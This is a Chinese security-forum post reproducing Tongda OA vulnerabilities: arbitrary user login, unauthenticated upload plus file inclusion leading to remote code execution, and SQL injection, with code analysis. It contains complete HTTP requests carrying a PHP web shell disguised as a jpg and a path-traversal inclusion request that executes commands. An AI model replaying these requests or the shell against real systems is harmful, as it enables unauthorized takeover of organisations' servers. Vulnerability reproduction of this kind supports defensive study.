用户
搜索
  • TA的每日心情
    奋斗
    2020-8-18 17:36
  • 签到天数: 5 天

    连续签到: 1 天

    [LV.2]偶尔看看

    i春秋-脚本小子

    Rank: 2

    6

    主题

    12

    帖子

    149

    魔法币
    收听
    2
    粉丝
    0
    注册时间
    2018-7-4
    发表于 2020-9-7 09:15:26 36848
    [size=9.0000pt]一、系统介绍
    通达 OA 是北京通达信科科技有限公司出品的 "Office Anywhere 通达网络智能办公系统"。
    漏洞概览       
    漏洞名称
    影响版本
    前台任意用户登录
    通达OA < 11.5.200417版本、通达OA 2017版本
    文件上传、文件包含导致RCE
    V11、2017版、2016版、2015版、2013增强版、2013版
    SQL注入
    测试11.5版
    二、漏洞复现2.1前台任意用户登录2.1.1漏洞描述
    攻击者在远程且未经授权的情况下,通过利用此漏洞,可以直接以任意用户身份登录到系统(包括系统管理员)
    2.1.2漏洞复现
    图片1.png
    2)使用poc生成PHPSESSID再次访问该url并抓包,替换cookie中的PHPSESSID为用poc生成的。放包,成功以系统管理员身份登录
    图片2.png
    图片3.png
    2.2文件上传、文件包含导致RCE2.2.1漏洞描述
    在受影响的版本中,攻击者可以在未认证的情况下向服务器上传 jpg 图片文件,然后包含该文件,造成远程代码执行。该漏洞无需登录即可触发
    2.2.2漏洞复现
    复现版本:11.3
    漏洞利用链接:
    任意文件上传漏洞  /ispirit/im/upload.php
    本地文件包含漏洞  /ispirit/interface/gateway.php
    图片4.png
    2)用burp抓包并将数据包修改成如下内容(ip替换为OA的ip)
    POST /ispirit/im/upload.php HTTP/1.1
    Host: 192.168.31.57
    Content-Length: 655
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBwVAwV3O4sifyhr3
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    ------WebKitFormBoundaryBwVAwV3O4sifyhr3
    Content-Disposition: form-data; name="UPLOAD_MODE"
    2
    ------WebKitFormBoundaryBwVAwV3O4sifyhr3
    Content-Disposition: form-data; name="P"
    ------WebKitFormBoundaryBwVAwV3O4sifyhr3
    Content-Disposition: form-data; name="DEST_UID"
    1
    ------WebKitFormBoundaryBwVAwV3O4sifyhr3
    Content-Disposition: form-data; name="ATTACHMENT"; filename="jpg"
    Content-Type: image/jpeg
    <?php
    $command=$_POST['cmd'];
    $wsh = new COM('WScript.shell');
    $exec = $wsh->exec("cmd /c ".$command);
    $stdout = $exec->StdOut();
    $stroutput = $stdout->ReadAll();
    echo $stroutput;
    ?>
    ------WebKitFormBoundaryBwVAwV3O4sifyhr3--
    修改完重放数据包
    图片5.png
    可以看到未登录情况下成功上传jpg文件
    图片6.png
    2)文件包含利用
    访问http://192.168.31.57/ispirit/interface/gateway.php ,POST 给 json 赋值,指定 key 为 url,value 为文件位置,修改为数据包内容如下:
    POST /ispirit/interface/gateway.php HTTP/1.1
    Host: 192.168.31.57
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 70
    json={"url":"/general/../../attach/im/2009/1251075309.jpg"}&cmd=whoami
    可以看到,执行“whoami”成功
    图片7.png
    2.2.3漏洞代码分
    1)通达 OA 使用 zend 加密,需要使用 SeayDzend 工具解密,解密包含漏洞的页面
    图片8.png
    2)文件上传webroot\ispirit\im\upload.php ,如下图,可以看到上传页面对参数P进行验证,如果P非空就不经过auth.php验证即可执行后续代码,利用此处逻辑漏洞可绕过登录验证进行文件上传
    图片9.png
    3)文件包含webroot/ispirit/interface/gateway.php , 通过foreach 循环解析json,如果key和url相等,获得url判断url是否为空,如果不为空且url中包含general/、ispirit/、module/,就调用include_once函数.
    可通过精心构造json进入47行的includ_once进行文件包含
    图片10.png
    2.3 SQL注入2.31 漏洞描述
    复现版本:11.5
    存在多处sql注入
    2.3.2 漏洞复现
    1)SQL注入1
    登录-个人事务-日程安排-日程查询
    图片11.png
    图片12.png
    抓包并使用sqlmap测试,参数‘starttime’存在注入
    图片13.png
    2)SQL注入2
    应用中心-报表中心-报表管理-门店销售(选择统计表进行编辑)
    图片14.png
    图片15.png
    抓包并使用sqlmap测试,参数‘id’存在注入
    图片16.png
    注入点分析:
    webroot\general\appbuilder\modules\report\controllers\RepdetailController.php中actionEdit函数中的$_GET["id"]未进行过滤,直接拼接到sql查询中,造成sql注入
    图片17.png
    [size=9.0000pt]三、参考链接
    https://mp.weixin.qq.com/s?__biz=MzAxMzg4NDg1NA==&mid=2247483732&idx=1&sn=062308df7b7ffaf8acb41837e5a703f1&chksm=9b9a8d8daced049b19601c978a98832a08026cefb373e161589db0a0f240ee2205b2d6ebba10&mpshare=1&scene=24&srcid=08225p4xVy6PekmCzfH26zpF&sharer_sharetime=1598138050981&sharer_shareid=b9872b429854cd9a0cc92c30f836e313&key=0a62b63f2856554913d4a4d0f5138fa2ccce483c5db895d5a284a8032f7f7f779d26bf1768b48eecfe3f85da5f7968346828cd498df8c41978242a7c0b687e5a96e6ac4a007890b8e11f7f39ae1b5e3e700aba28fd14e65eddb77806c364ab70d983e5f0fb32942d7f1678b1d236dea354d8ec9e0c2c35d192ea4471b9431b68&ascene=14&uin=MTQwNjQ0NjA2MQ%3D%3D&devicetype=Windows+10+x64&version=62090538&lang=zh_CN&exportkey=AYZemAWNajo3ycraAwg9Bw4%3D&pass_ticket=HaEOXTn7KBAP7GEEWWyyy%2FW1kHjVOPvH5Ner3u2y5uzGHVMPL7PjhSTlE5RNNbt2&wx_header=0

    学习下
    使用道具 举报 回复
    挺不错的,学习了
    使用道具 举报 回复
    膜拜,不是一般人能搞出来的
    使用道具 举报 回复
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册